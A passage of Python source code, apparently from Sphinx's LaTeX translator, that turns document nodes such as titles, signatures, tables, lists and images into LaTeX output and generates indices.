sphinxpkgoptions.append('maxlistdepth=%s' % self.elements['maxlistdepth'])
if sphinxpkgoptions:
self.elements['sphinxpkgoptions'] = '[,%s]' % ','.join(sphinxpkgoptions)
if self.elements['sphinxsetup']:
self.elements['sphinxsetup'] = (r'\sphinxsetup{%s}' % self.elements['sphinxsetup'])
if self.elements['extraclassoptions']:
self.elements['classoptions'] += ',' + \
self.elements['extraclassoptions']
self.highlighter = highlighting.PygmentsBridge('latex', self.config.pygments_style,
latex_engine=self.config.latex_engine)
self.context: list[Any] = []
self.descstack: list[str] = []
self.tables: list[Table] = []
self.next_table_colspec: str | None = None
self.bodystack: list[list[str]] = []
self.footnote_restricted: Element | None = None
self.pending_footnotes: list[nodes.footnote_reference] = []
self.curfilestack: list[str] = []
self.handled_abbrs: set[str] = set()
def pushbody(self, newbody: list[str]) -> None:
self.bodystack.append(self.body)
self.body = newbody
def popbody(self) -> list[str]:
body = self.body
self.body = self.bodystack.pop()
return body
def astext(self) -> str:
self.elements.update({
'body': ''.join(self.body),
'indices': self.generate_indices(),
})
return self.render('latex.tex_t', self.elements)
def hypertarget(self, id: str, withdoc: bool = True, anchor: bool = True) -> str:
if withdoc:
id = self.curfilestack[-1] + ':' + id
return (r'\phantomsection' if anchor else '') + r'\label{%s}' % self.idescape(id)
def hypertarget_to(self, node: Element, anchor: bool = False) -> str:
labels = ''.join(self.hypertarget(node_id, anchor=False) for node_id in node['ids'])
if anchor:
return r'\phantomsection' + labels
else:
return labels
def hyperlink(self, id: str) -> str:
return r'{\hyperref[%s]{' % self.idescape(id)
def hyperpageref(self, id: str) -> str:
return r'\autopageref*{%s}' % self.idescape(id)
def escape(self, s: str) -> str:
return texescape.escape(s, self.config.latex_engine)
def idescape(self, id: str) -> str:
return r'\detokenize{%s}' % str(id).translate(tex_replace_map).\
encode('ascii', 'backslashreplace').decode('ascii').\
replace('\\', '_')
def babel_renewcommand(self, command: str, definition: str) -> str:
if self.elements['multilingual']:
prefix = r'\addto\captions%s{' % self.babel.get_language()
suffix = '}'
else: # babel is disabled (mainly for Japanese environment)
prefix = ''
suffix = ''
return fr'{prefix}\renewcommand{{{command}}}{{{definition}}}{suffix}' + CR
def generate_indices(self) -> str:
def generate(content: list[tuple[str, list[IndexEntry]]], collapsed: bool) -> None:
ret.append(r'\begin{sphinxtheindex}' + CR)
ret.append(r'\let\bigletter\sphinxstyleindexlettergroup' + CR)
for i, (letter, entries) in enumerate(content):
if i > 0:
ret.append(r'\indexspace' + CR)
ret.append(r'\bigletter{%s}' % self.escape(letter) + CR)
for entry in entries:
if not entry[3]:
continue
ret.append(r'\item\relax\sphinxstyleindexentry{%s}' %
self.encode(entry[0]))
if entry[4]:
# add "extra" info
ret.append(r'\sphinxstyleindexextra{%s}' % self.encode(entry[4]))
ret.append(r'\sphinxstyleindexpageref{%s:%s}' %
(entry[2], self.idescape(entry[3])) + CR)
ret.append(r'\end{sphinxtheindex}' + CR)
ret = []
# latex_domain_indices can be False/True or a list of index names
indices_config = self.config.latex_domain_indices
if indices_config:
for domain in self.builder.env.domains.values():
for indexcls in domain.indices:
indexname = f'{domain.name}-{indexcls.name}'
if isinstance(indices_config, list):
if indexname not in indices_config:
continue
content, collapsed = indexcls(domain).generate(
self.builder.docnames)
if not content:
continue
ret.append(r'\renewcommand{\indexname}{%s}' % indexcls.localname + CR)
generate(content, collapsed)
return ''.join(ret)
def render(self, template_name: str, variables: dict[str, Any]) -> str:
renderer = LaTeXRenderer(latex_engine=self.config.latex_engine)
for template_dir in self.config.templates_path:
template = path.join(self.builder.confdir, template_dir,
template_name)
if path.exists(template):
return renderer.render(template, variables)
return renderer.render(template_name, variables)
@property
def table(self) -> Table | None:
"""Get current table."""
if self.tables:
return self.tables[-1]
else:
return None
def visit_document(self, node: Element) -> None:
self.curfilestack.append(node.get('docname', ''))
if self.first_document == 1:
# the first document is all the regular content ...
self.first_document = 0
elif self.first_document == 0:
# ... and all others are the appendices
self.body.append(CR + r'\appendix' + CR)
self.first_document = -1
if 'docname' in node:
self.body.append(self.hypertarget(':doc'))
# "- 1" because the level is increased before the title is visited
self.sectionlevel = self.top_sectionlevel - 1
def depart_document(self, node: Element) -> None:
pass
def visit_start_of_file(self, node: Element) -> None:
self.curfilestack.append(node['docname'])
self.body.append(CR + r'\sphinxstepscope' + CR)
def depart_start_of_file(self, node: Element) -> None:
self.curfilestack.pop()
def visit_section(self, node: Element) -> None:
if not self.this_is_the_title:
self.sectionlevel += 1
self.body.append(BLANKLINE)
def depart_section(self, node: Element) -> None:
self.sectionlevel = max(self.sectionlevel - 1,
self.top_sectionlevel - 1)
def visit_problematic(self, node: Element) -> None:
self.body.append(r'{\color{red}\bfseries{}')
def depart_problematic(self, node: Element) -> None:
self.body.append('}')
def visit_topic(self, node: Element) -> None:
self.in_minipage = 1
self.body.append(CR + r'\begin{sphinxShadowBox}' + CR)
def depart_topic(self, node: Element) -> None:
self.in_minipage = 0
self.body.append(r'\end{sphinxShadowBox}' + CR)
visit_sidebar = visit_topic
depart_sidebar = depart_topic
def visit_glossary(self, node: Element) -> None:
pass
def depart_glossary(self, node: Element) -> None:
pass
def visit_productionlist(self, node: Element) -> None:
self.body.append(BLANKLINE)
self.body.append(r'\begin{productionlist}' + CR)
self.in_production_list = 1
def depart_productionlist(self, node: Element) -> None:
self.body.append(r'\end{productionlist}' + BLANKLINE)
self.in_production_list = 0
def visit_production(self, node: Element) -> None:
if node['tokenname']:
tn = node['tokenname']
self.body.append(self.hypertarget('grammar-token-' + tn))
self.body.append(r'\production{%s}{' % self.encode(tn))
else:
self.body.append(r'\productioncont{')
def depart_production(self, node: Element) -> None:
self.body.append('}' + CR)
def visit_transition(self, node: Element) -> None:
self.body.append(self.elements['transition'])
def depart_transition(self, node: Element) -> None:
pass
def visit_title(self, node: Element) -> None:
parent = node.parent
if isinstance(parent, addnodes.seealso):
# the environment already handles this
raise nodes.SkipNode
if isinstance(parent, nodes.section):
if self.this_is_the_title:
if len(node.children) != 1 and not isinstance(node.children[0],
nodes.Text):
logger.warning(__('document title is not a single Text node'),
location=node)
if not self.elements['title']:
# text needs to be escaped since it is inserted into
# the output literally
self.elements['title'] = self.escape(node.astext())
self.this_is_the_title = 0
raise nodes.SkipNode
short = ''
if any(node.findall(nodes.image)):
short = ('[%s]' % self.escape(' '.join(clean_astext(node).split())))
try:
self.body.append(fr'\{self.sectionnames[self.sectionlevel]}{short}{{')
except IndexError:
# just use "subparagraph", it's not numbered anyway
self.body.append(fr'\{self.sectionnames[-1]}{short}{{')
self.context.append('}' + CR + self.hypertarget_to(node.parent))
elif isinstance(parent, nodes.topic):
self.body.append(r'\sphinxstyletopictitle{')
self.context.append('}' + CR)
elif isinstance(parent, nodes.sidebar):
self.body.append(r'\sphinxstylesidebartitle{')
self.context.append('}' + CR)
elif isinstance(parent, nodes.Admonition):
self.body.append('{')
self.context.append('}' + CR)
elif isinstance(parent, nodes.table):
# Redirect body output until title is finished.
self.pushbody([])
else:
logger.warning(__('encountered title node not in section, topic, table, '
'admonition or sidebar'),
location=node)
self.body.append(r'\sphinxstyleothertitle{')
self.context.append('}' + CR)
self.in_title = 1
def depart_title(self, node: Element) -> None:
self.in_title = 0
if isinstance(node.parent, nodes.table):
assert self.table is not None
self.table.caption = self.popbody()
else:
self.body.append(self.context.pop())
def visit_subtitle(self, node: Element) -> None:
if isinstance(node.parent, nodes.sidebar):
self.body.append(r'\sphinxstylesidebarsubtitle{')
self.context.append('}' + CR)
else:
self.context.append('')
def depart_subtitle(self, node: Element) -> None:
self.body.append(self.context.pop())
#############################################################
# Domain-specific object descriptions
#############################################################
# Top-level nodes for descriptions
##################################
def visit_desc(self, node: Element) -> None:
if self.config.latex_show_urls == 'footnote':
self.body.append(BLANKLINE)
self.body.append(r'\begin{savenotes}\begin{fulllineitems}' + CR)
else:
self.body.append(BLANKLINE)
self.body.append(r'\begin{fulllineitems}' + CR)
if self.table:
self.table.has_problematic = True
def depart_desc(self, node: Element) -> None:
if self.in_desc_signature:
self.body.append(CR + r'\pysigstopsignatures')
self.in_desc_signature = False
if self.config.latex_show_urls == 'footnote':
self.body.append(CR + r'\end{fulllineitems}\end{savenotes}' + BLANKLINE)
else:
self.body.append(CR + r'\end{fulllineitems}' + BLANKLINE)
def _visit_signature_line(self, node: Element) -> None:
def next_sibling(e: Node) -> Node | None:
try:
return e.parent[e.parent.index(e) + 1]
except (AttributeError, IndexError):
return None
def has_multi_line(e: Element) -> bool:
return e.get('multi_line_parameter_list')
self.has_tp_list = False
for child in node:
if isinstance(child, addnodes.desc_type_parameter_list):
self.has_tp_list = True
# recall that return annotations must follow an argument list,
# so signatures of the form "foo[tp_list] -> retann" will not
# be encountered (if they should, the `domains.python.py_sig_re`
# pattern must be modified accordingly)
arglist = next_sibling(child)
assert isinstance(arglist, addnodes.desc_parameterlist)
# tp_list + arglist: \macro{name}{tp_list}{arglist}{return}
multi_tp_list = has_multi_line(child)
multi_arglist = has_multi_line(arglist)
if multi_tp_list:
if multi_arglist:
self.body.append(CR + r'\pysigwithonelineperargwithonelinepertparg{')
else:
self.body.append(CR + r'\pysiglinewithargsretwithonelinepertparg{')
else:
if multi_arglist:
self.body.append(CR + r'\pysigwithonelineperargwithtypelist{')
else:
self.body.append(CR + r'\pysiglinewithargsretwithtypelist{')
break
if isinstance(child, addnodes.desc_parameterlist):
# arglist only: \macro{name}{arglist}{return}
if has_multi_line(child):
self.body.append(CR + r'\pysigwithonelineperarg{')
else:
self.body.append(CR + r'\pysiglinewithargsret{')
break
else:
# no tp_list, no arglist: \macro{name}
self.body.append(CR + r'\pysigline{')
def _depart_signature_line(self, node: Element) -> None:
self.body.append('}')
def visit_desc_signature(self, node: Element) -> None:
hyper = ''
if node.parent['objtype'] != 'describe' and node['ids']:
for id in node['ids']:
hyper += self.hypertarget(id)
self.body.append(hyper)
if not self.in_desc_signature:
self.in_desc_signature = True
self.body.append(CR + r'\pysigstartsignatures')
if not node.get('is_multiline'):
self._visit_signature_line(node)
else:
self.body.append(CR + r'\pysigstartmultiline')
def depart_desc_signature(self, node: Element) -> None:
if not node.get('is_multiline'):
self._depart_signature_line(node)
else:
self.body.append(CR + r'\pysigstopmultiline')
def visit_desc_signature_line(self, node: Element) -> None:
self._visit_signature_line(node)
def depart_desc_signature_line(self, node: Element) -> None:
self._depart_signature_line(node)
def visit_desc_content(self, node: Element) -> None:
assert self.in_desc_signature
self.body.append(CR + r'\pysigstopsignatures')
self.in_desc_signature = False
def depart_desc_content(self, node: Element) -> None:
pass
def visit_desc_inline(self, node: Element) -> None:
self.body.append(r'\sphinxcode{\sphinxupquote{')
def depart_desc_inline(self, node: Element) -> None:
self.body.append('}}')
# Nodes for high-level structure in signatures
##############################################
def visit_desc_name(self, node: Element) -> None:
self.body.append(r'\sphinxbfcode{\sphinxupquote{')
self.literal_whitespace += 1
def depart_desc_name(self, node: Element) -> None:
self.body.append('}}')
self.literal_whitespace -= 1
def visit_desc_addname(self, node: Element) -> None:
self.body.append(r'\sphinxcode{\sphinxupquote{')
self.literal_whitespace += 1
def depart_desc_addname(self, node: Element) -> None:
self.body.append('}}')
self.literal_whitespace -= 1
def visit_desc_type(self, node: Element) -> None:
pass
def depart_desc_type(self, node: Element) -> None:
pass
def visit_desc_returns(self, node: Element) -> None:
self.body.append(r'{ $\rightarrow$ ')
def depart_desc_returns(self, node: Element) -> None:
self.body.append(r'}')
def _visit_sig_parameter_list(self, node: Element, parameter_group: type[Element]) -> None:
"""Visit a signature parameters or type parameters list.
The *parameter_group* value is the type of a child node acting as a required parameter
or as a set of contiguous optional parameters.
The caller is responsible for adding the surrounding LaTeX macro argument start
and stop tokens.
"""
self.is_first_param = True
self.optional_param_level = 0
self.params_left_at_level = 0
self.param_group_index = 0
# Counts as what we call a parameter group either a required parameter, or a
# set of contiguous optional ones.
self.list_is_required_param = [isinstance(c, parameter_group) for c in node.children]
# How many required parameters are left.
self.required_params_left = sum(self.list_is_required_param)
self.param_separator = r'\sphinxparamcomma '
self.multi_line_parameter_list = node.get('multi_line_parameter_list', False)
def visit_desc_parameterlist(self, node: Element) -> None:
if not self.has_tp_list:
# close name argument (#1), open parameters list argument (#2)
self.body.append('}{')
self._visit_sig_parameter_list(node, addnodes.desc_parameter)
def depart_desc_parameterlist(self, node: Element) -> None:
# close parameterlist, open return annotation
self.body.append('}{')
def visit_desc_type_parameter_list(self, node: Element) -> None:
# close name argument (#1), open type parameters list argument (#2)
self.body.append('}{')
self._visit_sig_parameter_list(node, addnodes.desc_type_parameter)
def depart_desc_type_parameter_list(self, node: Element) -> None:
# close type parameters list, open parameters list argument (#3)
self.body.append('}{')
def _visit_sig_parameter(self, node: Element, parameter_macro: str) -> None:
if self.is_first_param:
self.is_first_param = False
elif not self.multi_line_parameter_list and not self.required_params_left:
self.body.append(self.param_separator)
if self.optional_param_level == 0:
self.required_params_left -= 1
else:
self.params_left_at_level -= 1
if not node.hasattr('noemph'):
self.body.append(parameter_macro)
def _depart_sig_parameter(self, node: Element) -> None:
if not node.hasattr('noemph'):
self.body.append('}')
is_required = self.list_is_required_param[self.param_group_index]
if self.multi_line_parameter_list:
is_last_group = self.param_group_index + 1 == len(self.list_is_required_param)
next_is_required = (
not is_last_group
and self.list_is_required_param[self.param_group_index + 1]
)
opt_param_left_at_level = self.params_left_at_level > 0
if opt_param_left_at_level or is_required and (is_last_group or next_is_required):
self.body.append(self.param_separator)
elif self.required_params_left:
self.body.append(self.param_separator)
if is_required:
self.param_group_index += 1
def visit_desc_parameter(self, node: Element) -> None:
self._visit_sig_parameter(node, r'\sphinxparam{')
def depart_desc_parameter(self, node: Element) -> None:
self._depart_sig_parameter(node)
def visit_desc_type_parameter(self, node: Element) -> None:
self._visit_sig_parameter(node, r'\sphinxtypeparam{')
def depart_desc_type_parameter(self, node: Element) -> None:
self._depart_sig_parameter(node)
def visit_desc_optional(self, node: Element) -> None:
self.params_left_at_level = sum([isinstance(c, addnodes.desc_parameter)
for c in node.children])
self.optional_param_level += 1
self.max_optional_param_level = self.optional_param_level
if self.multi_line_parameter_list:
if self.is_first_param:
self.body.append(r'\sphinxoptional{')
elif self.required_params_left:
self.body.append(self.param_separator)
self.body.append(r'\sphinxoptional{')
else:
self.body.append(r'\sphinxoptional{')
self.body.append(self.param_separator)
else:
self.body.append(r'\sphinxoptional{')
def depart_desc_optional(self, node: Element) -> None:
self.optional_param_level -= 1
if self.multi_line_parameter_list:
# If it's the first time we go down one level, add the separator before the
# bracket.
if self.optional_param_level == self.max_optional_param_level - 1:
self.body.append(self.param_separator)
self.body.append('}')
if self.optional_param_level == 0:
self.param_group_index += 1
def visit_desc_annotation(self, node: Element) -> None:
self.body.append(r'\sphinxbfcode{\sphinxupquote{')
def depart_desc_annotation(self, node: Element) -> None:
self.body.append('}}')
##############################################
def visit_seealso(self, node: Element) -> None:
self.body.append(BLANKLINE)
self.body.append(r'\begin{sphinxseealso}{%s:}' % admonitionlabels['seealso'] + CR)
def depart_seealso(self, node: Element) -> None:
self.body.append(BLANKLINE)
self.body.append(r'\end{sphinxseealso}')
self.body.append(BLANKLINE)
def visit_rubric(self, node: Element) -> None:
if len(node) == 1 and node.astext() in ('Footnotes', _('Footnotes')):
raise nodes.SkipNode
self.body.append(r'\subsubsection*{')
self.context.append('}' + CR)
self.in_title = 1
def depart_rubric(self, node: Element) -> None:
self.in_title = 0
self.body.append(self.context.pop())
def visit_footnote(self, node: Element) -> None:
self.in_footnote += 1
label = cast(nodes.label, node[0])
if self.in_parsed_literal:
self.body.append(r'\begin{footnote}[%s]' % label.astext())
else:
self.body.append('%' + CR)
self.body.append(r'\begin{footnote}[%s]' % label.astext())
if 'referred' in node:
# TODO: in future maybe output a latex macro with backrefs here
pass
self.body.append(r'\sphinxAtStartFootnote' + CR)
def depart_footnote(self, node: Element) -> None:
if self.in_parsed_literal:
self.body.append(r'\end{footnote}')
else:
self.body.append('%' + CR)
self.body.append(r'\end{footnote}')
self.in_footnote -= 1
def visit_label(self, node: Element) -> None:
raise nodes.SkipNode
def visit_tabular_col_spec(self, node: Element) -> None:
self.next_table_colspec = node['spec']
raise nodes.SkipNode
def visit_table(self, node: Element) -> None:
if len(self.tables) == 1:
assert self.table is not None
if self.table.get_table_type() == 'longtable':
raise UnsupportedError(
'%s:%s: longtable does not support nesting a table.' %
(self.curfilestack[-1], node.line or ''))
# change type of parent table to tabular
# see https://groups.google.com/d/msg/sphinx-users/7m3NeOBixeo/9LKP2B4WBQAJ
self.table.has_problematic = True
elif len(self.tables) > 2:
raise UnsupportedError(
'%s:%s: deeply nested tables are not implemented.' %
(self.curfilestack[-1], node.line or ''))
table = Table(node)
self.tables.append(table)
if table.colsep is None:
table.colsep = '|' * (
'booktabs' not in self.builder.config.latex_table_style
and 'borderless' not in self.builder.config.latex_table_style
)
if self.next_table_colspec:
table.colspec = '{%s}' % self.next_table_colspec + CR
if '|' in table.colspec:
table.styles.append('vlines')
table.colsep = '|'
else:
table.styles.append('novlines')
table.colsep = ''
if 'colwidths-given' in node.get('classes', []):
logger.info(__('both tabularcolumns and :widths: option are given. '
':widths: is ignored.'), location=node)
self.next_table_colspec = None
def depart_table(self, node: Element) -> None:
assert self.table is not None
labels = self.hypertarget_to(node)
table_type = self.table.get_table_type()
table = self.render(table_type + '.tex_t',
{'table': self.table, 'labels': labels})
self.body.append(BLANKLINE)
self.body.append(table)
self.body.append(CR)
self.tables.pop()
def visit_colspec(self, node: Element) -> None:
assert self.table is not None
self.table.colcount += 1
if 'colwidth' in node:
self.table.colwidths.append(node['colwidth'])
if 'stub' in node:
self.table.stubs.append(self.table.colcount - 1)
def depart_colspec(self, node: Element) -> None:
pass
def visit_tgroup(self, node: Element) -> None:
pass
def depart_tgroup(self, node: Element) -> None:
pass
def visit_thead(self, node: Element) -> None:
assert self.table is not None
# Redirect head output until header is finished.
self.pushbody(self.table.header)
def depart_thead(self, node: Element) -> None:
if self.body and self.body[-1] == r'\sphinxhline':
self.body.pop()
self.popbody()
def visit_tbody(self, node: Element) -> None:
assert self.table is not None
# Redirect body output until table is finished.
self.pushbody(self.table.body)
def depart_tbody(self, node: Element) -> None:
if self.body and self.body[-1] == r'\sphinxhline':
self.body.pop()
self.popbody()
def visit_row(self, node: Element) -> None:
assert self.table is not None
self.table.col = 0
_colsep = self.table.colsep
# fill columns if the row starts with the bottom of multirow cell
while True:
cell = self.table.cell(self.table.row, self.table.col)
if cell is None: # not a bottom of multirow cell
break
# a bottom of multirow cell
self.table.col += cell.width
if cell.col:
self.body.append('&')
if cell.width == 1:
# insert suitable strut for equalizing row heights in given multirow
self.body.append(r'\sphinxtablestrut{%d}' % cell.cell_id)
else: # use \multicolumn for wide multirow cell
self.body.append(r'\multicolumn{%d}{%sl%s}{\sphinxtablestrut{%d}}' %
(cell.width, _colsep, _colsep, cell.cell_id))
def depart_row(self, node: Element) -> None:
assert self.table is not None
self.body.append(r'\\' + CR)
cells = [self.table.cell(self.table.row, i) for i in range(self.table.colcount)]
underlined = [cell.row + cell.height == self.table.row + 1 # type: ignore[union-attr]
for cell in cells]
if all(underlined):
self.body.append(r'\sphinxhline')
else:
i = 0
underlined.extend([False]) # sentinel
if underlined[0] is False:
i = 1
while i < self.table.colcount and underlined[i] is False:
if cells[i - 1].cell_id != cells[i].cell_id: # type: ignore[union-attr]
self.body.append(r'\sphinxvlinecrossing{%d}' % i)
i += 1
while i < self.table.colcount:
# each time here underlined[i] is True
j = underlined[i:].index(False)
self.body.append(r'\sphinxcline{%d-%d}' % (i + 1, i + j))
i += j
i += 1
while i < self.table.colcount and underlined[i] is False:
if cells[i - 1].cell_id != cells[i].cell_id: # type: ignore[union-attr]
self.body.append(r'\sphinxvlinecrossing{%d}' % i)
i += 1
self.body.append(r'\sphinxfixclines{%d}' % self.table.colcount)
self.table.row += 1
def visit_entry(self, node: Element) -> None:
assert self.table is not None
if self.table.col > 0:
self.body.append('&')
self.table.add_cell(node.get('morerows', 0) + 1, node.get('morecols', 0) + 1)
cell = self.table.cell()
assert cell is not None
context = ''
_colsep = self.table.colsep
if cell.width > 1:
if self.config.latex_use_latex_multicolumn:
if self.table.col == 0:
self.body.append(r'\multicolumn{%d}{%sl%s}{%%' %
(cell.width, _colsep, _colsep) + CR)
else:
self.body.append(r'\multicolumn{%d}{l%s}{%%' % (cell.width, _colsep) + CR)
context = '}%' + CR
else:
self.body.append(r'\sphinxstartmulticolumn{%d}%%' % cell.width + CR)
context = r'\sphinxstopmulticolumn' + CR
if cell.height > 1:
# \sphinxmultirow 2nd arg "cell_id" will serve as id for LaTeX macros as well
self.body.append(r'\sphinxmultirow{%d}{%d}{%%' % (cell.height, cell.cell_id) + CR)
context = '}%' + CR + context
if cell.width > 1 or cell.height > 1:
self.body.append(r'\begin{varwidth}[t]{\sphinxcolwidth{%d}{%d}}'
% (cell.width, self.table.colcount) + CR)
context = (r'\par' + CR + r'\vskip-\baselineskip'
r'\vbox{\hbox{\strut}}\end{varwidth}%' + CR + context)
self.needs_linetrimming = 1
if len(list(node.findall(nodes.paragraph))) >= 2:
self.table.has_oldproblematic = True
if isinstance(node.parent.parent, nodes.thead) or (cell.col in self.table.stubs):
if len(node) == 1 and isinstance(node[0], nodes.paragraph) and node.astext() == '':
pass
else:
self.body.append(r'\sphinxstyletheadfamily ')
if self.needs_linetrimming:
self.pushbody([])
self.context.append(context)
def depart_entry(self, node: Element) -> None:
if self.needs_linetrimming:
self.needs_linetrimming = 0
body = self.popbody()
# Remove empty lines from top of merged cell
while body and body[0] == CR:
body.pop(0)
self.body.extend(body)
self.body.append(self.context.pop())
assert self.table is not None
cell = self.table.cell()
assert cell is not None
self.table.col += cell.width
_colsep = self.table.colsep
# fill columns if next ones are a bottom of wide-multirow cell
while True:
nextcell = self.table.cell()
if nextcell is None: # not a bottom of multirow cell
break
# a bottom part of multirow cell
self.body.append('&')
if nextcell.width == 1:
# insert suitable strut for equalizing row heights in multirow
# they also serve to clear colour panels which would hide the text
self.body.append(r'\sphinxtablestrut{%d}' % nextcell.cell_id)
else:
# use \multicolumn for not first row of wide multirow cell
self.body.append(r'\multicolumn{%d}{l%s}{\sphinxtablestrut{%d}}' %
(nextcell.width, _colsep, nextcell.cell_id))
self.table.col += nextcell.width
def visit_acks(self, node: Element) -> None:
# this is a list in the source, but should be rendered as a
# comma-separated list here
bullet_list = cast(nodes.bullet_list, node[0])
list_items = cast(Iterable[nodes.list_item], bullet_list)
self.body.append(BLANKLINE)
self.body.append(', '.join(n.astext() for n in list_items) + '.')
self.body.append(BLANKLINE)
raise nodes.SkipNode
def visit_bullet_list(self, node: Element) -> None:
if not self.compact_list:
self.body.append(r'\begin{itemize}' + CR)
if self.table:
self.table.has_problematic = True
def depart_bullet_list(self, node: Element) -> None:
if not self.compact_list:
self.body.append(r'\end{itemize}' + CR)
def visit_enumerated_list(self, node: Element) -> None:
def get_enumtype(node: Element) -> str:
enumtype = node.get('enumtype', 'arabic')
if 'alpha' in enumtype and (node.get('start', 0) + len(node)) > 26:
# fallback to arabic if alphabet counter overflows
enumtype = 'arabic'
return enumtype
def get_nested_level(node: Element) -> int:
if node is None:
return 0
elif isinstance(node, nodes.enumerated_list):
return get_nested_level(node.parent) + 1
else:
return get_nested_level(node.parent)
enum = "enum%s" % toRoman(get_nested_level(node)).lower()
enumnext = "enum%s" % toRoman(get_nested_level(node) + 1).lower()
style = ENUMERATE_LIST_STYLE.get(get_enumtype(node))
prefix = node.get('prefix', '')
suffix = node.get('suffix', '.')
self.body.append(r'\begin{enumerate}' + CR)
self.body.append(r'\sphinxsetlistlabels{%s}{%s}{%s}{%s}{%s}%%' %
(style, enum, enumnext, prefix, suffix) + CR)
if 'start' in node:
self.body.append(r'\setcounter{%s}{%d}' % (enum, node['start'] - 1) + CR)
if self.table:
self.table.has_problematic = True
def depart_enumerated_list(self, node: Element) -> None:
self.body.append(r'\end{enumerate}' + CR)
def visit_list_item(self, node: Element) -> None:
# Append "{}" in case the next character is "[", which would break
# LaTeX's list environment (no numbering and the "[" is not printed).
self.body.append(r'\item {} ')
def depart_list_item(self, node: Element) -> None:
self.body.append(CR)
def visit_definition_list(self, node: Element) -> None:
self.body.append(r'\begin{description}' + CR)
if self.table:
self.table.has_problematic = True
def depart_definition_list(self, node: Element) -> None:
self.body.append(r'\end{description}' + CR)
def visit_definition_list_item(self, node: Element) -> None:
pass
def depart_definition_list_item(self, node: Element) -> None:
pass
def visit_term(self, node: Element) -> None:
self.in_term += 1
ctx = ''
if node.get('ids'):
ctx = r'\phantomsection'
for node_id in node['ids']:
ctx += self.hypertarget(node_id, anchor=False)
ctx += r'}'
self.body.append(r'\sphinxlineitem{')
self.context.append(ctx)
def depart_term(self, node: Element) -> None:
self.body.append(self.context.pop())
self.in_term -= 1
def visit_classifier(self, node: Element) -> None:
self.body.append('{[}')
def depart_classifier(self, node: Element) -> None:
self.body.append('{]}')
def visit_definition(self, node: Element) -> None:
pass
def depart_definition(self, node: Element) -> None:
self.body.append(CR)
def visit_field_list(self, node: Element) -> None:
self.body.append(r'\begin{quote}\begin{description}' + CR)
if self.table:
self.table.has_problematic = True
def depart_field_list(self, node: Element) -> None:
self.body.append(r'\end{description}\end{quote}' + CR)
def visit_field(self, node: Element) -> None:
pass
def depart_field(self, node: Element) -> None:
pass
visit_field_name = visit_term
depart_field_name = depart_term
visit_field_body = visit_definition
depart_field_body = depart_definition
def visit_paragraph(self, node: Element) -> None:
index = node.parent.index(node)
if (index > 0 and isinstance(node.parent, nodes.compound) and
not isinstance(node.parent[index - 1], nodes.paragraph) and
not isinstance(node.parent[index - 1], nodes.compound)):
# insert blank line, if the paragraph follows a non-paragraph node in a compound
self.body.append(r'\noindent' + CR)
elif index == 1 and isinstance(node.parent, (nodes.footnote, footnotetext)):
# don't insert blank line, if the paragraph is second child of a footnote
# (first one is label node)
pass
else:
# the \sphinxAtStartPar is to allow hyphenation of first word of
# a paragraph in narrow contexts such as in a table cell
# added as two items (cf. line trimming in depart_entry())
self.body.extend([CR, r'\sphinxAtStartPar' + CR])
def depart_paragraph(self, node: Element) -> None:
self.body.append(CR)
def visit_centered(self, node: Element) -> None:
self.body.append(CR + r'\begin{center}')
if self.table:
self.table.has_problematic = True
def depart_centered(self, node: Element) -> None:
self.body.append(CR + r'\end{center}')
def visit_hlist(self, node: Element) -> None:
self.compact_list += 1
ncolumns = node['ncolumns']
if self.compact_list > 1:
self.body.append(r'\setlength{\multicolsep}{0pt}' + CR)
self.body.append(r'\begin{multicols}{' + ncolumns + r'}\raggedright' + CR)
self.body.append(r'\begin{itemize}\setlength{\itemsep}{0pt}'
r'\setlength{\parskip}{0pt}' + CR)
if self.table:
self.table.has_problematic = True
def depart_hlist(self, node: Element) -> None:
self.compact_list -= 1
self.body.append(r'\end{itemize}\raggedcolumns\end{multicols}' + CR)
def visit_hlistcol(self, node: Element) -> None:
pass
def depart_hlistcol(self, node: Element) -> None:
# \columnbreak would guarantee same columns as in html output. But
# some testing with long items showed that columns may be too uneven.
        # And in the case of only short items, the automatic column breaks should
# match the ones pre-computed by the hlist() directive.
# self.body.append(r'\columnbreak\n')
pass
def latex_image_length(self, width_str: str, scale: int = 100) -> str | None:
try:
return rstdim_to_latexdim(width_str, scale)
except ValueError:
logger.warning(__('dimension unit %s is invalid. Ignored.'), width_str)
return None
def is_inline(self, node: Element) -> bool:
"""Check whether a node represents an inline element."""
return isinstance(node.parent, nodes.TextElement)
def visit_image(self, node: Element) -> None:
pre: list[str] = [] # in reverse order
post: list[str] = []
include_graphics_options = []
has_hyperlink = isinstance(node.parent, nodes.reference)
if has_hyperlink:
is_inline = self.is_inline(node.parent)
else:
is_inline = self.is_inline(node)
if 'width' in node:
if 'scale' in node:
w = self.latex_image_length(node['width'], node['scale'])
else:
w = self.latex_image_length(node['width'])
if w:
include_graphics_options.append('width=%s' % w)
if 'height' in node:
if 'scale' in node:
h = self.latex_image_length(node['height'], node['scale'])
else:
h = self.latex_image_length(node['height'])
if h:
include_graphics_options.append('height=%s' % h)
if 'scale' in node:
if not include_graphics_options:
# if no "width" nor "height", \sphinxincludegraphics will fit
# to the available text width if oversized after rescaling.
include_graphics_options.append('scale=%s'
% (float(node['scale']) / 100.0))
if 'align' in node:
align_prepost = {
# By default latex aligns the top of an image.
(1, 'top'): ('', ''),
(1, 'middle'): (r'\raisebox{-0.5\height}{', '}'),
(1, 'bottom'): (r'\raisebox{-\height}{', '}'),
(0, 'center'): (r'{\hspace*{\fill}', r'\hspace*{\fill}}'),
# These 2 don't exactly do the right thing. The image should
# be floated alongside the paragraph. See
# https://www.w3.org/TR/html4/struct/objects.html#adef-align-IMG
(0, 'left'): ('{', r'\hspace*{\fill}}'),
(0, 'right'): (r'{\hspace*{\fill}', '}'),
}
try:
pre.append(align_prepost[is_inline, node['align']][0])
post.append(align_prepost[is_inline, node['align']][1])
except KeyError:
pass
if self.in_parsed_literal:
pre.append(r'{\sphinxunactivateextrasandspace ')
post.append('}')
if not is_inline and not has_hyperlink:
pre.append(CR + r'\noindent')
post.append(CR)
pre.reverse()
if node['uri'] in self.builder.images:
uri = self.builder.images[node['uri']]
else:
# missing image!
if self.ignore_missing_images:
return
uri = node['uri']
if uri.find('://') != -1:
# ignore remote images
return
self.body.extend(pre)
options = ''
if include_graphics_options:
options = '[%s]' % ','.join(include_graphics_options)
base, ext = path.splitext(uri)
if self.in_title and base:
            # Forcibly lowercase tokens because some fncychap themes capitalize
# the options of \sphinxincludegraphics unexpectedly (ex. WIDTH=...).
cmd = fr'\lowercase{{\sphinxincludegraphics{options}}}{{{{{base}}}{ext}}}'
else:
cmd = fr'\sphinxincludegraphics{options}{{{{{base}}}{ext}}}'
